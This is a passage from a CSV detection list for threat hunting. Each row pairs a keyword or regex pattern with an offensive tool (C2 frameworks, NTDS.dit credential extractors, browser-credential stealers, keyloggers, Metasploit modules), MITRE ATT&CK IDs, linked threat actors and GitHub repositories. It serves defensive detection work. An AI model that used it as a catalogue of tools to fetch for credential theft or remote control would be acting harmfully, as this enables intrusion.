Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41021" "*Discovery_RemoteSystemDiscovery_GetNetComputer.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetComputer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41022" "*Discovery_RemoteSystemDiscovery_GetNetDomain.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41023" "*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomainController\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41024" "*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*",".{0,1000}Discovery_SecuritySoftwareDiscovery_ListAVByTasklist\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41025" "*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*",".{0,1000}Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41026" "*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLastLoggedOn\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41027" "*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLoggedOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 
T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41028" "*Disctopia Backdoor*",".{0,1000}Disctopia\sBackdoor.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41029" "*disctopia-c2.git*",".{0,1000}disctopia\-c2\.git.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41030" "*disctopia-c2-main.zip*",".{0,1000}disctopia\-c2\-main\.zip.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41031" "*DiskCryptor Device Installation Disk*",".{0,1000}DiskCryptor\sDevice\sInstallation\sDisk.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41035" "*DiskCryptor driver*",".{0,1000}DiskCryptor\sdriver.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system 
partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41036" "*DISKCRYPTOR_MUTEX*",".{0,1000}DISKCRYPTOR_MUTEX.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#content","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41037" "*diskcryptor2john.py*",".{0,1000}diskcryptor2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41038" "*DiskCryptor-master*",".{0,1000}DiskCryptor\-master.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41039" "*display_privilege_escalation_options(*",".{0,1000}display_privilege_escalation_options\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","41052" "*dist*_brc4.x64.o*",".{0,1000}dist.{0,1000}_brc4\.x64\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos 
tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41060" "*dist*_brc4.x86.o*",".{0,1000}dist.{0,1000}_brc4\.x86\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41061" "*dist/agent.upx.exe*",".{0,1000}dist\/agent\.upx\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41062" "*dist/agent.windows.exe*",".{0,1000}dist\/agent\.windows\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41063" "*dist/coercedpotato.cna*",".{0,1000}dist\/coercedpotato\.cna.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","41064" "*dist/nanorobeus_cs.*",".{0,1000}dist\/nanorobeus_cs\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41065" "*dist/shadow.exe*",".{0,1000}dist\/shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","41066" "*dist\shadow.exe*",".{0,1000}dist\\shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","41067" "*dist-packages/tor2web/*",".{0,1000}dist\-packages\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","41068" "*distro.ibiblio.org/blackarch/*/os/*",".{0,1000}distro\.ibiblio\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","41069" "*DIT Explorer Credential 
Extractor*",".{0,1000}DIT\sExplorer\sCredential\sExtractor.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#content","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41070" "*DitExplorer.Core*",".{0,1000}DitExplorer\.Core.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41071" "*DitExplorer.CredentialExtraction*",".{0,1000}DitExplorer\.CredentialExtraction.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41072" "*DitExplorer.EseInterop*",".{0,1000}DitExplorer\.EseInterop.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41073" "*DitExplorer.Ntds*",".{0,1000}DitExplorer\.Ntds.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41074" "*DitExplorer.UI.*",".{0,1000}DitExplorer\.UI\..{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41075" 
"*DitExplorer.UI.WpfApp.dll*",".{0,1000}DitExplorer\.UI\.WpfApp\.dll.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41076" "*DitExplorer.UI.WpfApp.exe*",".{0,1000}DitExplorer\.UI\.WpfApp\.exe.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41077" "*DitExplorer-v1.0-win64-release.zip*",".{0,1000}DitExplorer\-v1\.0\-win64\-release\.zip.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41078" "*DitExplorer-v1.0-win64-release-standalone.zip*",".{0,1000}DitExplorer\-v1\.0\-win64\-release\-standalone\.zip.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41079" "*ditty/ditty.c*",".{0,1000}ditty\/ditty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z","41080" "*Dive Shell - Emperor Hacking Team*",".{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - 
T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","41081" "*diversenok/TokenUniverse*",".{0,1000}diversenok\/TokenUniverse.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","41082" "*Diverto/IPPrintC2*",".{0,1000}Diverto\/IPPrintC2.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","41083" "*djhohnstein/SharpChromium*",".{0,1000}djhohnstein\/SharpChromium.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","41084" "*djhohnstein/SharpLogger*",".{0,1000}djhohnstein\/SharpLogger.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","41085" "*djhohnstein/SharpSC*",".{0,1000}djhohnstein\/SharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","41086" "*DKMC-master.zip*",".{0,1000}DKMC\-master\.zip.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41087" "*dl http://ipinfo.io 2>/dev/nul*",".{0,1000}dl\shttp\:\/\/ipinfo\.io\s2\>\/dev\/nul.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","41088" "*DLHell v2.0*",".{0,1000}DLHell\sv2\.0.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41090" "*DLHell.py -*",".{0,1000}DLHell\.py\s\-.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41091" "*dlink_central_wifimanager_rce.*",".{0,1000}dlink_central_wifimanager_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41092" "*dlink_sharecenter_cmd_exec*",".{0,1000}dlink_sharecenter_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","41093" "*dlink_telnet_backdoor_userpass*",".{0,1000}dlink_telnet_backdoor_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41094" "*Dliv3/Venom*",".{0,1000}Dliv3\/Venom.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","41095" "*DLL Hell - DLL Proxifier/Hijacker*",".{0,1000}DLL\sHell\s\-\sDLL\sProxifier\/Hijacker.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41096" "*DLL INJECTION EXECUTED SUCCESSFULLY :D*",".{0,1000}DLL\sINJECTION\sEXECUTED\sSUCCESSFULLY\s\:D.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41097" "*dll* 
[HIJACKABLE]*",".{0,1000}dll.{0,1000}\s\[HIJACKABLE\].{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41098" "*dll\reflective_dll.*",".{0,1000}dll\\reflective_dll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - 
Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","N/A","10","","N/A","","","","41099" "*dll_generator.py*",".{0,1000}dll_generator\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","41100" "*dll_hijack_detect_x64*",".{0,1000}dll_hijack_detect_x64.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","41101" "*dll_hijack_detect_x86*",".{0,1000}dll_hijack_detect_x86.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","41102" "*dll_hijack_hunter*",".{0,1000}dll_hijack_hunter.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
